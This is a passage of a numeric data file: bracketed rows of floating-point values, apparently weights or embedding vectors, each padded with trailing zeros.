0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.523365, -1.1768, 0.2394, 0.294089, -0.0290111, 0.292261, -0.0482682, 0.271242, 0.120938, -0.115028, -0.216612, 0.497935, 0.377178, -0.629046, 0.202047, -0.0394781, 0.269632, -0.242836, -0.171539, -0.678277, 0.663372, -0.393727, -0.0881842, 0.0297598, 0.0435318, 0.320854, 0.316377, -1.13962, 0.120425, 0.0108914, -0.275979, -0.240492, -0.131277, -0.894161, -0.408075, -0.338061, -0.755773, -0.874971, -0.0615467, 0.173906, -0.203296, 0.54136, 0.2073, -0.190242, 0.115566, 0.482389, 0.0139929, 0.129507, 0.41511, -0.168015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.63983, 0.151639, 0.15938, -0.192297, 0.359868, -0.379765, 0.0802711, 0.382811, 0.704535, -0.424408, 0.342411, 0.607665, -0.513556, -0.505145, 0.634796, 0.0169458, -0.0168074, -0.11984, -0.183137, -0.214978, 0.0434535, -0.575842, -0.961149, -0.0168695, 0.00911016, 0.89859, 0.206176, -0.709384, -1.36601, 0.312972, -0.25026, 0.131526, -0.220566, 0.330025, -0.955898, 0.147051, 0.638369, 0.179771, 0.224727, 0.820985, -0.232776, 0.442288, 0.38936, 0.179038, 0.376713, -0.478651, -0.0865827, 0.992032, -0.867595, 0.110182, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.725576, -0.110651, 0.00871704, -0.0551965, 1.04627, -0.106633, -1.70031, 0.215941, -0.0979674, 0.0169424, 1.11406, -0.491598, -0.305924, -0.382736, -0.88252, 0.0358007, -0.924792, 0.628041, -0.655295, 0.249463, 0.48359, 0.217952, -0.0324509, 0.0129095, -0.0178394, -0.502926, -0.305849, -0.941628, -0.57384, -0.206011, -0.739743, 0.531728, -0.0110122, 0.476996, 0.924741, 0.923774, -1.27938, -0.204927, -0.00328265, -1.59904, -0.0433172, 0.106217, -0.159827, -0.437727, -0.657261, 0.380875, -0.750097, -1.65317, 0.745442, 0.0815731, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.609517, -0.177843, -0.033271, -0.167257, 0.141614, -0.395988, -2.17483, -1.06968, -0.657932, -0.334686, 0.340993, 0.283504, -0.0173562, -0.0399413, -1.09367, -0.0470512, 0.565738, -2.7786, -0.361353, -0.00362902, 0.167532, 0.436635, -0.192575, 0.0184835, 0.0358275, 0.433853, 0.0320743, 0.345735, -0.191802, 0.505923, 0.580156, 0.0698568, -0.685144, -1.133, 0.104537, 0.243287, -0.0985993, -0.0112771, -0.466352, 0.359352, 0.215064, -0.0340575, -0.0634264, -0.206534, -0.0144381, 0.527265, 0.514802, -0.041349, 0.388571, 0.343423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0656973, 0.42894, 0.021952, 0.182689, -0.647742, -0.237031, -1.11693, -0.338863, -0.443821, 0.723949, -1.84738, -1.19253, 0.200781, 0.450855, -0.17667, -0.00829342, -1.66793, -0.303494, 0.0997389, -0.669466, -1.14161, -0.166033, -0.0786037, 0.0044661, 0.0202669, 0.675591, 0.0511027, -0.0743772, 0.685487, -0.0735949, 0.0184659, -0.43698, 0.428111, 0.204631, -0.676454, -0.124178, 1.87746, 0.288625, -0.0736747, 0.770818, 0.337971, 0.592075, -0.0406023, 0.077207, 0.336376, 0.573569, 1.03577, -0.229216, -0.70296, 0.00499674, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0414376, 0.00368568, -0.0192691, -0.0345287, -0.0139882, -0.00555261, -0.0309755, 0.000261231, 0.0107101, -0.0504574, -0.0494216, 0.0317727, -0.0263354, -0.0306606, 0.00537624, 0.01726, -0.041904, -0.00182176, 0.0190573, -0.0556392, -0.050865, -0.0439605, -0.0559331, 0.0388789, -0.0478446, -0.0219769, 0.000390671, -0.0349014, -0.0306691, 0.0357105, 0.0225564, -0.0307099, 0.0127869, 0.000890971, 0.0241678, 0.0275835, 0.0274931, -0.0131301, -0.0293854, 0.0261036, -0.0606141, -0.0506689, 0.0143724, 0.0238213, -0.0297303, 0.002036, 0.0340467, -0.0292854, -0.0179797, -0.0483377, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0113389, 0.604814, 0.00251949, -0.271782, -0.191352, -0.293133, 0.153257, 0.360225, 0.282504, -0.323278, 0.527838, -0.655755, -0.492981, 0.807615, 0.15752, 0.00209674, 0.626342, 0.17061, -0.0537781, 0.86281, 0.294526, 0.0654629, -0.204141, -0.00333945, -0.0109438, 0.280218, -0.517888, 0.0258155, 0.180951, 0.740674, -0.00676968, 0.29065, -0.835604, -0.0200452, -1.38225, -0.165902, 0.0023489, 0.225198, 0.028184, 0.87987, 0.0867377, 0.581448, 0.244987, 0.0863329, 0.0458126, -0.16052, -0.961061, -1.84979, 0.0731202, 0.0282582, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.368695, 0.263083, 0.140912, -0.327789, -0.0368086, -0.11641, 0.0612997, 0.1356, 0.848766, 0.058811, -1.10532, 0.39424, 0.0617332, 0.47155, -0.743006, 0.0363225, -1.37475, -0.254104, -0.250116, -0.427303, -0.07486, 2.09467, -0.41261, 0.0206808, -0.0200387, -2.70812, 0.373432, 0.0599537, -0.642167, -0.176551, 0.187799, -0.0861577, 0.411067, -0.0165315, -6.5173e-05, -0.0663925, 1.17456, -0.51202, 0.135414, 0.185266, -0.0777025, -1.49654, 0.721455, -0.0701605, -0.275571, -0.161102, 1.61876, 0.485306, -0.0519263, 0.0975666, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.319624, 1.55082, 0.229315, -1.20844, 0.0206282, 0.0808243, 0.118085, -0.810775, 0.0250333, -0.215429, 1.19483, 0.499759, -0.837816, -0.28498, -0.0056145, -0.00992754, 0.708286, 0.813682, 0.966016, 0.549447, -0.468758, 0.220178, 0.111147, 0.0121496, -0.0341207, -0.0815913, -0.162864, -0.270638, 0.581463, -0.121412, 0.207404, -0.404903, 0.759158, 0.273773, -0.936182, 0.0461429, -0.589076, -0.158522, -0.0165169, 0.810663, -0.00962627, 2.10891, -1.08988, 0.39727, -0.27216, -3.31289, -0.0196586, 0.70175, -0.110245, -0.24569, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.122607, 0.394524, -0.314113, -0.00619769, 0.711275, -0.0823144, -0.482402, -2.48933, -0.870596, 0.0181258, -1.10754, -0.526174, -0.242918, 0.5181, 0.0557912, 0.0454726, 0.0855753, -1.48645, 0.343221, -0.537091, -0.644581, 0.146458, -0.0243296, -0.0462997, 0.03226, -1.62043, 0.137981, 1.60083, -1.52357, 0.392864, 0.251254, 0.580318, 1.20224, -1.21149, -1.26633, -2.39168, 2.02772, 0.115325, -0.199669, 1.12908, 0.297942, -0.597661, -1.30359, -0.920368, 0.591552, -2.55962, -1.3459, 1.32661, 0.211996, -0.142341, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0156274, 0.0168518, -0.0230844, -0.0579289, -0.0560536, -0.0409155, -0.0126873, -0.0357573, 0.0366471, 0.0106708, 0.0359433, -0.0112173, -0.0188018, -0.00436176, -0.0289048, -0.0159432, 0.0290383, 0.039863, -0.043133, 0.0392535, -0.0122079, 0.034629, -0.0204436, -0.0281258, 0.00718058, -0.0310906, -0.0250631, 0.0155047, -0.00733336, 0.0135802, 0.0210936, 0.0334198, -0.00472475, -0.0240138, -0.0265337, 0.00934959, 0.01106, -0.0484832, -0.0139009, 0.000895336, -0.0292063, -0.0457798, -0.0217811, 0.0191885, -0.0060496, 0.0213942, -0.0480005, -0.00345817, -0.00183496, 0.00954576, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.30402, 0.626339, 0.0552874, -0.268339, 0.15172, 0.164563, 0.87601, 0.819321, 0.540492, 0.339196, -0.496015, 0.352337, 0.0857369, -1.52285, -0.571385, 0.0302344, -1.30673, 0.89297, -0.587058, -1.18263, -0.201872, 1.35521, 0.254507, -0.00741729, -0.0143483, 0.491481, 0.321675, 0.266766, 0.641303, 0.0427328, 0.133116, -0.186202, -0.128464, -0.0482698, 0.0386627, 1.12985, -0.245704, 0.255579, -0.153309, -0.309185, 0.384614, 0.529026, -0.136027, -0.149134, -0.479501, -0.135705, 1.15677, 0.744923, 0.667122, -0.400556, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.11264, -0.191974, -0.0486374, -0.414322, -1.09569, 0.874824, -0.962628, 1.05673, 0.2164, -1.64585, 0.625732, 0.054045, -2.29822, -0.141679, -1.06724, -0.0268634, -0.151942, 0.187875, 0.213262, 0.0731845, -0.148585, -0.362837, -0.376127, -0.00460273, -0.00749795, -2.94721, 1.04731, 0.116199, 1.82704, -0.649764, -0.488225, -0.493207, -1.68811, -0.345315, 1.75317, 0.684938, -1.41104, 0.843098, -0.037797, -0.630935, -0.298131, 0.299646, 0.476681, -0.411436, -1.42993, 0.266032, -3.33751, -2.60804, -0.567104, 0.809038, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.924685, -1.69476, -0.0256847, -1.6155, -0.138748, 0.526928, -0.0627263, 0.0319344, -0.583238, 0.479487, -1.33356, -0.686037, -1.24445, 0.592074, -0.656349, 0.0181061, -0.879366, 1.58465, -0.268623, -0.64867, -0.248281, 0.00207757, 0.175082, 0.0393948, -0.0313731, 0.458929, 0.00457807, -0.315914, 1.23199, 0.0671696, 0.143879, 0.531725, -0.30002, -0.0317503, -1.77664, -0.178742, 1.78787, 0.183242, 0.0837026, -0.509367, 0.136983, -0.492983, -0.232635, -0.0970851, -0.111253, 1.21521, 1.03742, 0.532422, 1.46487, 0.129427, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.862811, -0.670008, -1.37987, -0.109881, 0.0747215, 0.720224, -0.0325526, -0.145169, -0.350966, -0.194082, 0.692988, -0.795648, 0.340393, -0.435768, 0.124802, 0.0377229, -0.925762, -0.045185, 0.15111, 0.117047, 0.0623455, 0.475161, -0.195921, 0.0245318, -0.026756, -0.235258, 0.10174, 0.487501, 0.0568525, 0.949231, -0.9967, -1.03949, 1.20506, 0.0508084, 0.0144275, -0.874393, -0.132608, 0.0960484, -2.87336, -1.79127, 0.0882902, 0.0465161, -0.0430049, 0.570457, 0.6819, 0.305011, -1.17411, -0.142216, 0.0451093, 0.541226, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00148601, -0.00357013, -0.0616925, -0.0636764, 0.0247695, -0.0304841, -0.0441116, 0.00903143, -0.0222439, 0.0112654, -0.0229218, -0.0373045, -0.0050473, -0.0279536, 0.0173872, 0.0393649, 0.011608, -0.0437569, -0.0403116, -0.0562019, 0.0298804, 0.00430499, 0.0257676, 0.0146079, -0.0186624, 0.0259071, 0.0124396, 0.0303811, -0.0229133, -0.0460154, 0.0273132, -0.0527346, 0.0388513, -0.00536339, -0.0109783, -0.0371028, -0.0028464, -0.0663156, -0.045411, -0.0462137, -0.0033154, -0.0365228, 0.0291231, -0.0246833, -0.0277126, 0.00548551, -0.0176978, 0.0258907, -0.0413788, 0.0121408, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.78534, -0.059711, -0.000766731, 0.921483, -0.709602, 0.380256, 0.194282, 0.00413015, -2.65517, 0.668865, -0.271555, -0.145263, 0.297035, 0.948821, -1.81939, 0.0420457, -0.977775, -0.0752278, -0.325641, -0.414047, -1.11357, -0.369069, -0.0641627, 0.0450483, 0.0367067, -0.0664357, 0.674046, -0.109957, 1.51405, -0.990457, 0.546237, 0.210234, 0.0236006, 0.807868, -1.50949, 0.298036, -1.76316, 0.124708, -0.822992, -0.135506, 0.058422, -2.55649, -0.167629, 0.304168, 1.11131, -5.61323, 0.315244, -0.0748288, -0.604054, 1.01662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0187562, -0.033321, -0.0381534, 0.0162084, -0.0362454, -0.0332758, 0.00157786, 0.0133417, -0.019265, 0.0137116, 0.0424212, -0.0129916, -0.0546914, -0.0207646, -0.0292256, -0.0308969, 0.0133515, -0.0334743, 0.00750258, 0.00400925, -0.00160565, -0.0397202, -0.0434836, 0.0100943, -0.0101321, 0.000216635, -0.0440908, -0.045878, 0.0240436, -0.00757035, -0.0203618, 0.0146069, 0.00367429, -0.029869, 0.0224676, -0.00470809, -0.0244964, -0.0455441, -0.0125318, -0.00157622, -0.0319749, -0.0180606, -0.0063315, 0.00583772, 0.0311452, -0.000495937, -0.0440696, 0.0436874, 0.0142928, 0.0261217, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.953141, -1.71866, -1.83983, -0.0186287, -0.0108845, 0.117798, 0.0828269, -0.836869, -0.0901551, -0.147973, 0.525239, -0.685936, -0.678019, 0.306611, -0.347638, -0.00513682, 0.822991, -0.341358, 0.887914, -0.731914, -0.0304687, -1.10387, 0.363775, -0.0290053, 0.00713952, 0.167939, 0.296245, -0.291795, -0.591269, -0.0627268, -0.494668, 0.0946488, 1.50354, 0.534049, -0.0262355, 0.0913687, -0.131227, 0.46155, -1.27119, -1.40876, 0.226335, 0.832614, 0.585714, -1.1919, -0.15921, -0.27747, 0.102021, -0.13363, -0.0323088, 0.497007, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.2521, 2.07829, -0.0329299, -0.319502, 0.398989, 0.039076, -1.10795, -0.443853, -0.0610469, 0.14882, -0.959466, -0.373463, -0.306637, -0.134118, 0.584793, -0.0452735, 0.0619634, 0.558684, 0.0890687, -0.112625, 0.617972, -0.920084, -0.234827, 0.0129866, 0.0111995, -0.0011833, -0.649588, 2.71724, -0.51884, -0.805562, 0.420988, 0.252446, 0.765109, -1.1996, 1.05707, -1.71301, -0.17782, 0.280743, -0.292837, -0.944582, -0.0642112, -0.801893, -1.06214, 0.0772809, 0.234639, 0.99623, -0.282232, 2.29765, -2.0628, -0.369362, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.582439, 0.832878, -0.628175, -0.103516, -0.00012316, 0.316154, -0.26108, 0.0305011, 0.212839, 0.183509, -0.307016, -0.29067, -0.11557, -0.185324, -0.0989584, 0.0396352, 0.13184, 0.198769, -0.196362, 0.0995212, -0.291282, 1.17858, 0.134234, 0.048321, 0.0367209, 0.205507, 0.368398, 1.21318, -0.185465, 0.178056, 0.185864, 0.0590555, -0.0998919, -0.211, 0.215657, 0.331866, -0.166343, -0.0286584, -0.0261148, 0.256146, 0.183969, -0.353116, 1.1167, -0.0611925, -0.0252538, 0.342589, 0.124633, -0.24947, 0.321963, 0.822282, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.136892, 0.0721447, -0.259287, -0.0208208, -0.150657, -0.0895253, 0.0245684, -0.0341342, -0.12217, -0.0638194, -0.0282255, -0.199508, -0.0666232, 0.0329192, -0.097983, 0.0476624, 0.0698389, -0.0434745, 0.047505, -0.105288, 0.00866304, 0.0507566, 0.0317675, 0.0456378, -0.0355532, 0.0265718, 0.0790676, 0.0372404, 0.0998752, 0.0470625, 0.0201793, -0.0482221, 0.0617173, -0.0301293, 0.0471854, 0.0880959, -0.0627413, -0.0514169, -0.0115459, -0.0172184, -0.0297773, 0.0544937, 0.0215543, 0.0896598, 0.00351407, 0.119885, -0.0481029, -0.0745631, 0.0316946, 0.00437533, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.582286, -0.110757, 0.215679, -0.0994347, 0.291611, 0.792005, -2.64376, 0.133335, 0.0345007, -0.546771, -1.5891, -0.588209, 0.133503, -1.36478, 0.0448261, 0.00432367, 1.96065, -0.341599, 0.904003, -1.37234, 0.215873, -2.43843, -0.384582, 0.0185384, -0.0453791, 0.91527, -0.551158, 0.41838, 0.467866, 0.198787, -0.60859, 0.382509, -0.378152, 0.66569, -0.0523714, 0.049119, 0.223137, -0.410575, 0.900935, 0.872933, -0.230819, 0.963895, -0.0629918, 0.238003, 0.0529725, 0.424931, -0.251649, -1.05977, -2.00609, 0.540805, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.785965, -0.271735, -0.405375, 0.159904, -0.842578, 0.337405, 0.111826, -0.0151781, -0.138691, 0.422929, -0.306801, 0.0784142, -0.393566, 0.207184, 0.21136, 0.00340884, -0.46877, 0.123268, -0.0601133, 0.688706, -0.266501, 0.185157, 0.0704262, -0.0182847, -0.0201253, 0.551132, -0.650357, -0.628632, 0.758445, -0.636277, -0.608634, -0.0163685, -0.240027, 1.07946, -0.546335, 0.448533, 0.376862, 0.655255, 0.174317, -0.354294, -0.232278, 0.116388, -0.332993, -0.578722, 0.209091, -0.578318, 0.451814, 0.931644, 0.108932, 0.0911851, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.65823, -0.776449, -0.0138354, -0.183888, 0.563507, 0.248737, 0.655927, 0.719709, 0.194328, -0.119841, -0.143374, 0.231831, 0.248526, -0.599032, 0.182668, -0.0133104, -0.10328, -0.160372, 0.261886, -0.588056, 0.257225, -0.716549, -0.227665, -0.00740986, 0.0392912, 0.501854, -0.246226, -0.630082, -0.000497745, -0.227172, -0.386701, 0.0433633, 0.495595, 0.724143, -0.555112, 0.365661, 0.643484, -0.0611116, 0.164031, 0.255418, -0.224586, -0.0591111, -0.301646, -0.620003, 0.207101, -0.0112214, 0.327933, 1.04446, -0.256591, 0.59388, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.334011, 0.404652, -0.461713, 0.0216312, 0.0224788, 0.580186, 0.0162693, 0.130441, -0.336561, 0.0898612, 0.789693, 0.802602, -0.0485138, -0.497132, -0.132076, -0.000658427, 0.389836, -0.104748, -0.145367, -0.178632, 0.478789, -0.0159836, 0.20124, -0.0382066, -0.00511412, 0.376309, 0.229704, 0.320189, -0.260227, -0.114185, -0.0672746, -0.240187, -0.699651, 0.62902, -0.380714, 0.110032, -0.559745, 0.67688, 1.25499, -0.372185, -0.633603, 0.413567, 0.228946, 0.747292, -0.212495, -0.782072, 0.0701209, 0.717564, -0.0537419, 0.278422, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.358666, -0.208551, -0.258723, 0.111306, 0.0596215, -0.454309, 0.182454, -0.822783, -0.686008, 0.744587, -2.17534, -0.418214, -0.122385, 1.37504, 0.485839, 0.00550466, -0.442638, 